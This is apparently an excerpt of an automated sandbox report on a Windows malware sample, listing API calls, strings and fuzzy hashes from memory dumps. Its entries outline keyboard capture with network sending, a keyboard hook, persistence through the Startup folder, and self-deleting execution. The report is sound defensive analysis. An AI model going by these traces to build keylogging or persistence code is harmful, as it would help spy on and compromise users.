                                                                                                                                                                                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                              • _free.LIBCMT ref: 100091E2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 100091F4
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10009206
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10009218
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                                                              • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00443305
                                                                                                                                                                                                                                • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00443317
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044332A
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044333B
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044334C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                                                              • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 1000536F
                                                                                                                                                                                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10005381
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10005394
                                                                                                                                                                                                                              • _free.LIBCMT ref: 100053A5
                                                                                                                                                                                                                              • _free.LIBCMT ref: 100053B6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                                                              • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __freea
                                                                                                                                                                                                                              • String ID: a/p$am/pm
                                                                                                                                                                                                                              • API String ID: 240046367-3206640213
                                                                                                                                                                                                                              • Opcode ID: 2cad59953637bd3fd0c756841fb5f84b8e282f4168b37ad12c06d58a69c8ffb6
                                                                                                                                                                                                                              • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cad59953637bd3fd0c756841fb5f84b8e282f4168b37ad12c06d58a69c8ffb6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                                                                                                                                              • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                                                                                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                                                                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                                                                                                                                              • String ID: (FG
                                                                                                                                                                                                                              • API String ID: 3142014140-2273637114
                                                                                                                                                                                                                              • Opcode ID: e2d1511c28add454b0ada0f3d3c19ffaec0e9cd4d3a45452fa2e7b74fbd0573e
                                                                                                                                                                                                                              • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2d1511c28add454b0ada0f3d3c19ffaec0e9cd4d3a45452fa2e7b74fbd0573e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Enum$InfoQueryValue
                                                                                                                                                                                                                              • String ID: DG
                                                                                                                                                                                                                              • API String ID: 3554306468-2560412334
                                                                                                                                                                                                                              • Opcode ID: 38a45ed7d02d992e2acb11fc4f6aef4a179d291d22532329d765b65af94885bf
                                                                                                                                                                                                                              • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38a45ed7d02d992e2acb11fc4f6aef4a179d291d22532329d765b65af94885bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                                                                                                                                • Part of subcall function 004041F1: socket.WS2_32(00000000,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,00000000,00000000), ref: 004042A5
                                                                                                                                                                                                                                • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000284,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                                                                                                                                              • String ID: XCG$`AG$>G
                                                                                                                                                                                                                              • API String ID: 2334542088-2372832151
                                                                                                                                                                                                                              • Opcode ID: ee39e8c37b0884666c6cc2857c5e23d6ce2cc18a75a75f296070d922ecec505f
                                                                                                                                                                                                                              • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee39e8c37b0884666c6cc2857c5e23d6ce2cc18a75a75f296070d922ecec505f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe,00000104), ref: 00442714
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004427DF
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004427E9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                                                                                                                                                                              • API String ID: 2506810119-2827799107
                                                                                                                                                                                                                              • Opcode ID: b75dab3948bdc1979b3e0d7ca0cde66feab97c2c4a325a3b0c659ceb83c609df
                                                                                                                                                                                                                              • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b75dab3948bdc1979b3e0d7ca0cde66feab97c2c4a325a3b0c659ceb83c609df
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe,00000104), ref: 10004C1D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10004CE8
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10004CF2
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                                                                                                                                                                              • API String ID: 2506810119-2827799107
                                                                                                                                                                                                                              • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                                                              • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,0046559C,0046BA00,00000000,00000000,00000000), ref: 0041665C
                                                                                                                                                                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                                                                                              • String ID: /t
                                                                                                                                                                                                                              • API String ID: 1462127192-3161277685
                                                                                                                                                                                                                              • Opcode ID: 669ed64058b930da4fb5de9ea67f3b866301e1755641a7ca28a9c279cceb2098
                                                                                                                                                                                                                              • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 669ed64058b930da4fb5de9ea67f3b866301e1755641a7ca28a9c279cceb2098
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Object
                                                                                                                                                                                                                              • String ID: XF$$$<XF
                                                                                                                                                                                                                              • API String ID: 2936123098-2187388861
                                                                                                                                                                                                                              • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                                                                                                                                              • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                                                              • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                                              • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                                                                              • String ID: pth_unenc
                                                                                                                                                                                                                              • API String ID: 3123878439-4028850238
                                                                                                                                                                                                                              • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                                                                                                              • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                                                              • Opcode ID: e9ddfd591fde217df266798dfb54151bebf12cee69e5f24c35a905db6cd6d6f7
                                                                                                                                                                                                                              • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9ddfd591fde217df266798dfb54151bebf12cee69e5f24c35a905db6cd6d6f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: ad0ffcebbd7e30faace55aec6b2c0d2f8d27b80f7879fc3eee3a0d10a54d69a7
                                                                                                                                                                                                                              • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad0ffcebbd7e30faace55aec6b2c0d2f8d27b80f7879fc3eee3a0d10a54d69a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,00000001,?,?,00000001,?,?), ref: 0044FF20
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00000001,?,?,00000001,?,?,?), ref: 0044FFA9
                                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,?,?,?,00000002,?), ref: 0044FFBB
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0044FFC4
                                                                                                                                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00446B31
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2652629310-0
                                                                                                                                                                                                                              • Opcode ID: ad6417158e1c78f6f463d4a6d524ead8b3a476fcc30d311aeb4854f60d20ed6d
                                                                                                                                                                                                                              • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad6417158e1c78f6f463d4a6d524ead8b3a476fcc30d311aeb4854f60d20ed6d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 100087D5
                                                                                                                                                                                                                                • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2652629310-0
                                                                                                                                                                                                                              • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                                                              • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad$AddressDirectoryProcSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4217395396-0
                                                                                                                                                                                                                              • Opcode ID: eb34a3b39f8cebbf818652b9c61e1d8af9f13deba3c3e1946aabc5676101914a
                                                                                                                                                                                                                              • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb34a3b39f8cebbf818652b9c61e1d8af9f13deba3c3e1946aabc5676101914a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseOpenQuerySleepValue
                                                                                                                                                                                                                              • String ID: @CG$exepath$BG
                                                                                                                                                                                                                              • API String ID: 4119054056-3221201242
                                                                                                                                                                                                                              • Opcode ID: d2372903b6a5c566b5ef7dab359a7a76f7083d39763b5bf14b4beffcf5975f58
                                                                                                                                                                                                                              • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d2372903b6a5c566b5ef7dab359a7a76f7083d39763b5bf14b4beffcf5975f58
